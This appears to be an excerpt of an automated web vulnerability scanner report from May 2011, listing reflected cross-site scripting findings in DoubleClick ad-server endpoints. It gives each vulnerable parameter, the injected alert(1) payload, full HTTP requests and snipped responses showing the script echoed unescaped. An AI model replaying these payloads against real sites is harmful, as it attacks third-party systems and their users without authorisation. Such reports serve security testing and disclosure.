<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9511b"-alert(1)-"27fa9528383 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:28 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79bd"-alert(1)-"cf2b07c19b1 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:38 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVM%26%26cid%3DGENRET%3B877237%3B62579852%3B239944841%3B39988934"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6cf3"-alert(1)-"1cadb0e3ce6 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:51 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84e2"-alert(1)-"9a3c17528a7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:05 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d68"-alert(1)-"baa51e6d3e2 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:36 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c938b"-alert(1)-"d1206cc109e was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:24 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eff5"-alert(1)-"d3279316554 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:15 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88246"-alert(1)-"34f3da19b89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:38 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 768d1"-alert(1)-"4d04f2c569 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:47 GMT Content-Length: 9311
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVN%26%26cid%3DGENRET%3B877237%3B62579858%3B239944212%3B39988944"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64a83"-alert(1)-"d897ed4d1c2 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:53:46 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60583"-alert(1)-"42928ca0e0e was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:53:56 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ec41"-alert(1)-"31c5ba5de38 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:25 GMT
Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edfc6"-alert(1)-"fc5c4421cff was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:16 GMT
Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17651"-alert(1)-"3f123fd8fd4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:06 GMT
Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383aa"-alert(1)-"6682829cf01 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:36 GMT
Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e1fc"-alert(1)-"fb131e4ea40 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:35 GMT
Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Thrilloftrade.tos%3Fo%3D2%26a%3DIVN%26%26cid%3DGENRET%3B877237%3B62579861%3B239944998%3B39989395"); var fscUrl = url; var fscUrlClickTa ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e433a'%3balert(1)//574f9c7b613 was submitted in the tile parameter. This input was echoed as e433a';alert(1)//574f9c7b613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ec5c"-alert(1)-"d8956f93e59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b30c"-alert(1)-"9695098fb11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9017c"-alert(1)-"80544c6b860 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net.68327.9418.302br.net
Path: /jsi/adi/N5047.Turn/B5053148.22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34676"-alert(1)-"f580a372d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1 HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333cb"-alert(1)-"eeb14d1dc7a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70c35"-alert(1)-"57f7527f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b70a"-alert(1)-"8de33777c29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82738"-alert(1)-"fe73189adbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
